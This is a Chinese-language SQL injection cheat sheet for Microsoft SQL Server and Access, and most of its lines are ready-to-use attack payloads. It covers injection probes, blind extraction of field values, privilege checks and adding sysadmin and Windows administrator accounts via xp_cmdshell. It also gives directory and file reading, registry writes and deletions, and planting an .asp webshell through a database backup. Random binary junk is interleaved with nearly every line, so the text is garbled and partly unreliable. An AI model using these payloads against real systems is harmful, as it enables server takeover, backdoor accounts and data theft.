1.判断是否有注入;and 1=1 ;and 1=2 P$Fq62;}r4
2.初步判断是否是mssql ;and user>0 A��k+MR�EG
[�_1K1�i"m
3.注入参数是字符'and [查询条件] and ''=' ���li����
`O�e"s�_O#
4.搜索时没过滤参数的'and [查询条件] and '%25'=' *�ulkqp�O
H�'�x)�[2
5.判断数据库系统 }HxC��~J�"
W�3]?>sLE*
;and (select count(*) from sysobjects)>0 mssql �6Gs�B�*hW
�2<TpNGXM_
;and (select count(*) from msysobjects)>0 access �U�$E�Q�eb
�KC�i0v���
gmdA1�$��c
nrJW.F]S8[
6.猜数据库 ;and (select Count(*) from [数据库名])>0
EzGO/uZ]�
f;]�C8/�W
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 j)Y68fKK��
:0vKt 6>Sp
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 _&�K>fy3t&
!H4C5��wDu
9.(1)猜字段的ascii值(access) [=& tN)_�
r@ v&��~pL
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 4C`p`AQqpQ
U�U����DZ�
(2)猜字段的ascii值(mssql) x�?n13���C
Kpf�Q=�~'
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 +.IncY�8C$
@9\L�|O'~?
10.测试权限结构(mssql) �f6�JC>Np
k'PN�fx\K
;[!��W*8.c
���?.6fVSa
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 4nU�+�Wj?T
�Ht&%`\9�s
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- \>�<v1�x>;
#jT=;G�7f2
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- gbjql+Mx+�
pXl�*`[0X#
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �j[Oh>�yG�
/�<)k�I(gf
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- aJ�SB�G|IC
9�
M�!U@>�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ]��Aa���.=
'I�5��~<"E
;and 1=(select IS_MEMBER('db_owner'));-- <gjA�(xT�5
�v|GDP�q��
U{�M��oy�j
4j�}uVGi{e
11.添加mssql和系统的帐户 �G&d��z<f�
vl:V�?-sY
;exec master.dbo.sp_addlogin username;-- ��k_](�u91
;exec master.dbo.sp_password null,username,password;-- C~��8;2/F7
f<X��i/��(
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- A)�6�41�"[
6��i'kc3w�
;exec master.dbo.xp_cmdshell 'net user username password J:G�~�9~V^
�'-vzQ�d@y
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �
:qr�CqFl
r"x/,!��_E
;exec master.dbo.xp_cmdshell 'net user username password /add';-- VTs
,Ln!,U
+JP�HQx'�W
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ��X$9
"dL�
+=g9T`YbE�
�(VB-5&b��
97M�byEE8J
12.(1)遍历目录 I�v51,0A��
�H*����vd�
;create table dirs(paths varchar(100), id int) C����bjx{�
?�?��h4qJ
;insert dirs exec master.dbo.xp_dirtree 'c:\' WQ)��vu&�;
�OQ*rxL�cA
;and (select top 1 paths from dirs)>0 q+cx.�Rc#�
Erq%�Ck(��
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) *;�Gn��od<
d <Rv~�F@
�wfrS�I:+>
Z Ne(sg~G
(2)遍历目录 �o� 12w��p
aT20�F�EZ;
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ;}QM#5Xdt�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Zmz�YJ$:�6
hV�d�PO���
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 y�v�t
�:/X
`;v>fTc�y
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 J6J|&Z~UT,
4�8"=,I�rM
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 {B)�-+0� 6
;�/)u/[KAv
�
���M�t
�
)�sG�/�H8�
13.mssql中的存储过程 @;g|sty�h^
MfK}D�EJK,
xp_regenumvalues 注册表根键, 子键 'D17]Lp~�.
2��y@y<3�8
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 N]�7#Q.(~
�}8)iFP&�"
xp_regread 根键,子键,键值名 +�nm?+��F
>%Nqg�n$�V
;exec xp_regread kh���S� >�
�,c�.(�&@
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 t+%tN^87:�
%x��h�A�2�
xp_regwrite 根键,子键, 值名, 值类型, 值 �@z��Aav�>
K %Qj<�{�)
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 :��?J0e4.]
,e!9WKJ
B�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 {�a�VL3�QU
k!=
jO#)Rd
xp_regdeletevalue 根键,子键,值名 pjrz�o��MF
4j �VFzO%.
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 X2S:"0?7��
bbA�J5EqL�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 j �
hr��pS
0=�"U'�|J_
<OA[u-ph%S
e'L$g-;>4b
14.mssql的backup创建webshell sB����'Z9�
&�#�DKB#.2
use model �PR;�A 0
�
��)�]P��%=
create table cmd(str image); 4�}MZB*);0
2%�g�L��q
insert into cmd(str) values (''); VVV�w\|JB>
P�D��tLJt$
backup database model to disk='c:\l.asp'; J'4V_Kjg�-
e�!.r- �v9
NkL>ru!�b9
J~(M%]
&k^
15.mssql内置函数 x�9B�5@2J1
J�4�>k9~q�
;and (select @@version)>0 获得Windows的版本号 i�IO_��d4Z
�&H�IG77�6
;and user_name()='dbo' 判断当前系统的连接用户是不是sa U�1~6�o"1H
+u�]L#�].;
;and (select user_name())>0 爆当前系统的连接用户 ga�a;PX���
#�(f- ��cK
;and (select db_name())>0 得到当前连接的数据库 V��/CZcMY_
SRBQ"X�[M2
5"o)^8��!>
usz�H1@�g'
16.简洁的webshell G'0]m-)�dw
U�?s�io%`(
use model ?VP07
dQTe
H;=+��+D�h
create table cmd(str image); QZ^P2==x��
N�9jSi�RJ�
insert into cmd(str) values (''); �Q]"u�?�Q]
�h Lv_E�R?
backup database model to disk='g:\wwwtest\l.asp';
